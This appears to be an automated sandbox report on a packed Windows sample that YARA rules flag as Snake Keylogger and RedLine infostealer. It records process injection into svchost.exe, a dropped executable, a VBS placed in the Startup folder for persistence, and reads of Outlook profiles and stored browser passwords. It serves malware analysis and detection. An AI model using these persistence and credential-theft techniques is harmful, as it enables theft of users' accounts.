                  Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000005.00000002.2206920824.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.2089442641.0000000001290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: B7N48hmO78.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9888500650074294
                  Source: demonetised.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9888500650074294
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2CE7A GetLastError,FormatMessageW,0_2_00E2CE7A
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1AB84 AdjustTokenPrivileges,CloseHandle,0_2_00E1AB84
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E1B134
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D5AB84 AdjustTokenPrivileges,CloseHandle,2_2_00D5AB84
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D5B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00D5B134
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E2E1FD
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E26532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00E26532
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E3C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00E3C18C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00DE406B
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeFile created: C:\Users\user\AppData\Local\inhumateJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeFile created: C:\Users\user\AppData\Local\Temp\autA0D9.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005588000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005556000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005548000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2280827631.00000000063ED000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.000000000557B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005538000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000540A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005419000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005428000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000544C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2397824219.00000000062BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: B7N48hmO78.exeVirustotal: Detection: 73%
                  Source: B7N48hmO78.exeReversingLabs: Detection: 79%
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeFile read: C:\Users\user\Desktop\B7N48hmO78.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\B7N48hmO78.exe "C:\Users\user\Desktop\B7N48hmO78.exe"
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeProcess created: C:\Users\user\AppData\Local\inhumate\demonetised.exe "C:\Users\user\Desktop\B7N48hmO78.exe"
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\B7N48hmO78.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\inhumate\demonetised.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeProcess created: C:\Users\user\AppData\Local\inhumate\demonetised.exe "C:\Users\user\Desktop\B7N48hmO78.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\B7N48hmO78.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\inhumate\demonetised.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Binary string: _.pdb source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: demonetised.exe, 00000002.00000003.2085085714.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2085935423.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2202790607.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2203800929.0000000004060000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: demonetised.exe, 00000002.00000003.2085085714.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2085935423.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2202790607.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2203800929.0000000004060000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00F02F90 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00F02F90
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E705B8 push ss; ret 0_2_00E705B9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E06B05 push ecx; ret 0_2_00E06B18
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00DB05B8 push ss; ret 2_2_00DB05B9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D46B05 push ecx; ret 2_2_00D46B18
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00423149 push eax; ret 3_2_00423179
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004231C8 push eax; ret 3_2_00423179
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E21D push ecx; ret 3_2_0040E230
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FE558 push eax; iretd 3_2_077FE559
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeFile created: C:\Users\user\AppData\Local\inhumate\demonetised.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbsJump to dropped file
